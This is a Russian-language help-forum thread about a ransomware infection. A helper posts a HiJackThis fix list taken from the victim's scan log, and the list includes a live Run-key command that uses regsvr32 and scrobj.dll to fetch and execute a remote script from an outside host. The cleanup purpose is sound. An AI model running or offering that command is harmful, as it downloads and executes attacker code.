Добрый день!
Поймали вирус шифровальщик. Пример зашифрованного файла, логи сканирования AutoLogger и файл послания расшифровки во вложении. Очень нужна помощь!
Printable View
Добрый день!
Поймали вирус шифровальщик. Пример зашифрованного файла, логи сканирования AutoLogger и файл послания расшифровки во вложении. Очень нужна помощь!
Уважаемый(ая) [B]deman_ru[/B], спасибо за обращение на наш форум!
Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Здравствуйте,
Данный тип шифровальщика новый (похоже ранее не встречал), пока в стадии изучения.
При наличии лицензии на любой из продуктов Касперского [URL="https://forum.kasperskyclub.ru/topic/48525-%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5-%D0%B7%D0%B0%D0%BF%D1%80%D0%BE%D1%81%D0%B0-%D0%BD%D0%B0-%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%BA%D1%83-%D1%84%D0%B0%D0%B9%D0%BB%D0%BE%D0%B2-%D0%B2-%D0%BB%D0%B0%D0%B1%D0%BE%D1%80%D0%B0%D1%82%D0%BE%D1%80%D0%B8%D1%8E-%D0%BA%D0%B0%D1%81%D0%BF%D0%B5%D1%80%D1%81%D0%BA%D0%BE%D0%B3%D0%BE/"]создайте запрос на расшифровку[/URL].
Если вас интересует чистка от вредоносного ПО и остатков от шифровальщика, то выполните следующее:
HiJackThis (из каталога [B]autologger[/B])[URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]профиксить[/URL]
[B]Важно[/B]: необходимо отметить и профиксить [B]только[/B] то, что указано ниже.
[CODE]
O4 - Global User Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DECODING_FILES.txt
O4 - Startup other users: C:\Users\USR1CV83\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECODING_FILES.txt
O4 - Startup other users: C:\Users\ZIAdmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECODING_FILES.txt
O4 - Startup other users: C:\Users\ZIBuh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECODING_FILES.txt
O4 - Startup other users: C:\Users\ZIIntervolga\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECODING_FILES.txt
O4 - Startup other users: C:\Users\ZIKukovkinII\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECODING_FILES.txt
O4 - User Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECODING_FILES.txt
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mys2016.info:280/v1.sct scrobj.dll
O7 - IPSec: Name: win (2020/06/10) - {ca7bd39f-fa66-4839-9a25-fc0e4bb24cfb} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/06/10) - {ca7bd39f-fa66-4839-9a25-fc0e4bb24cfb} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/06/10) - {ca7bd39f-fa66-4839-9a25-fc0e4bb24cfb} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/06/10) - {ca7bd39f-fa66-4839-9a25-fc0e4bb24cfb} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/06/10) - {ca7bd39f-fa66-4839-9a25-fc0e4bb24cfb} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task (.job): (disabled) (Not scheduled) my1.job - c:\windows\system\my1.bat (file missing)
[/CODE]
Логи сделаны в терминальной сессии, сделайте их из консоли.